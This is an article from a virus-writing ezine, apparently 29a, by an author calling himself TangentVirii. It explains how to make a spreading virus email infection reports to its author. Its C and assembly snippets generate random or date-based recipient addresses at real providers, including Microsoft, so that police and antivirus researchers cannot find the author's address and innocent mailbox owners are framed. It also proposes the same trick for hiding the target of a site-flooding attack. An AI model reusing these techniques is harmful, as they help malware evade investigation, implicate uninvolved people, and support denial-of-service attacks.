VIRII FEEDBACK by TangentVirii. INTRO. Uh... it was suposed to be a big article about Artificial Life applied to the virus world, but I hadn't got so much time. So I wrote this mini text, then if 29a#5 is released before the other article is finished I can publish a text (this text) there anyway. Ok, lets go to the real problem. I think one of the problems for virus coders is that we usually haven't got feedback with our programs. For instance, if we spread a virus, we can't know if it's working well or not. The unique way to know if all has worked fine is reading the AVers texts: if they say something as 'The 5626 Virus is one of the most powerful viruses in the world. It has infected more than 60000 PCs over the world', we know that all is fine. However, these texts aren't very trustable. They have lots of lies, and other bullshits. The question is: how can my virus say me if he's spreading a lot, or not? I have an answer to this question that appeared in my mind when I began thinking about using ALIFE related ideas with viruses. It's using the mail, but in a strange way. MAILING. In this article we aren't gonna explain how to send a single mail with Win32... we 're gonna explain a more original thing. How to do it in a secure way! If you want to learn how to send a mail with the Win32 API, search it in Internet, there's a lot of info about Winsock. You can send mails with MAPI... or you can do it with SMTP, that is more efficient. U CHOOSE. FEEDBACK. The idea in this text is to allow viruses to send us info by email without showing our email address to all the world. That is what I call feedback. It'd be nice receiving a mail from our virii saying he's fine and he's spreading a lot!!! WHATS THE PROBLEM. Think you write a code as the following... emailtext db 'Hello, I've infected other machine.',0 emailaddress db 'stupidmailer@yahoo.com',0 ; mail me a text push offset emailtext push offset emailaddress call sendEmailToMe ...where sendEmailToMe is a simple function that uses SMTP (or MAPI) to send a mail with the text emailtext to emailaddress. It's fine, but what about if you don't want to show your email address? You can crypt the emailaddress too, but a sniffer can capture the email address anyway. How the hell can you hide your address but allowing your virii to mail you? DO I NEED IT? You r not gonna need nothing of this if you uses a secure mail server, because of this way you haven't to worry about cops going to you. If you give your mail to ppl in virus ezines, as 29a members do, and you sign your virus with your handle, it's useless to try to hide your mail because cops know it. This info is only useful if you need to hide your mail address but you want virus emailing you. Else, you can read it anyway, because it can be useful for you in the future. And if you think is very dangerous to put your email address in a virii, this article is for you. EUREKA. See the following C code: switch(rand()%4){ case 0: sendMailToMe(text,"stupidmailer@yahoo.com"); break; case 1: sendMailToMe(text,"idioticmailer@hotmail.com"); break; case 2: sendMailToMe(text,"joe@otherserver.com"); break; case 3: sendMailToMe(text,"billgates@microsoft.com"); break; } What do you think can happen with this code? If somebody tries to trap you he have to investigate four persons, including Bill Gates!!! Can you imagine Bill going in jail because of you? :) One problem with this code is that you'll only receive one of four mails but... do you need all of them? Think your virus can infect thousands of computers, it can be a lot!!! And if you make a virus send as much random mails as posible, you can ever receive lots of mails. But four mails aren't enough. You have to add more addresses so AVers and cops can't figure which is the yours. What about combining them? For example: switch(rand()%4){ case 0: person="joe"; break; case 1: person="john"; break; case 2: person="billgates"; break; case 3: person="virusauthor"; break; } switch(rand()%4){ case 0: wsprintf(emailaddress,"%s@yahoo.com",person); break; case 1: wsprintf(emailaddress,"%s@hotmail.com",person); break; case 2: wsprintf(emailaddress,"%s@29a.org",person); break; case 3: wsprintf(emailaddress,"%s@microsoft.com",person); break; } sendMailToMe(text,emailaddress); Oh!, now you have 4*4= 16 different mails!!! Do you catch the idea? Using the same system you can create tons of mail addresses on the fly. If you can do it real, so almost all the email addresses exist, you can spoof cops a lot!!! However, 16 isn't enough... you have to create more and more email addresses. A system can be: char user[5]={0,0,0,0,0}; char buffer[]="johnearbilljaneeditotpartgoalredh" memcpy(user,buffer+(rand()%30),4); switch(rand()%4){ case 0: wsprintf(emailaddress,"%s@yahoo.com",user); break; case 1: wsprintf(emailaddress,"%s@hotmail.com",user); break; case 2: wsprintf(emailaddress,"%s@29a.org",user); break; case 3: wsprintf(emailaddress,"%s@microsoft.com",user); break; } See some of the email addresses generated by this code: john@29a.org need@microsoft.com bill@yahoo.com llja@hotmail.com goal@yahoo.com They are 30*4=120 different email addresses, all of 4 chars followed by the server name. Most of them are sure registered, and some not. You can register one of the inexistent ones, and bingo!!! And, of course, only increasing the buffer array size, you can increment the email addresses. Better, if you change all rand by a time routine, what do you think can happen? You can calculate all so some day all mails are redirected to you, else they go elsewhere, and AVers couldn't figure what's your real mail!!! OTHER USES. If you are programming a virus that will flood a site, or something of this way, you can use that system to hide the server address, and a random day, BOOM!!! BYE. Ok, enough for today. I have other things to do. :) Any questions, email me. Also, if you have interesting ideas about ALIFE and viruses, mail me, I want to hear them. TangentVirii. tangentvirii@privacyx.com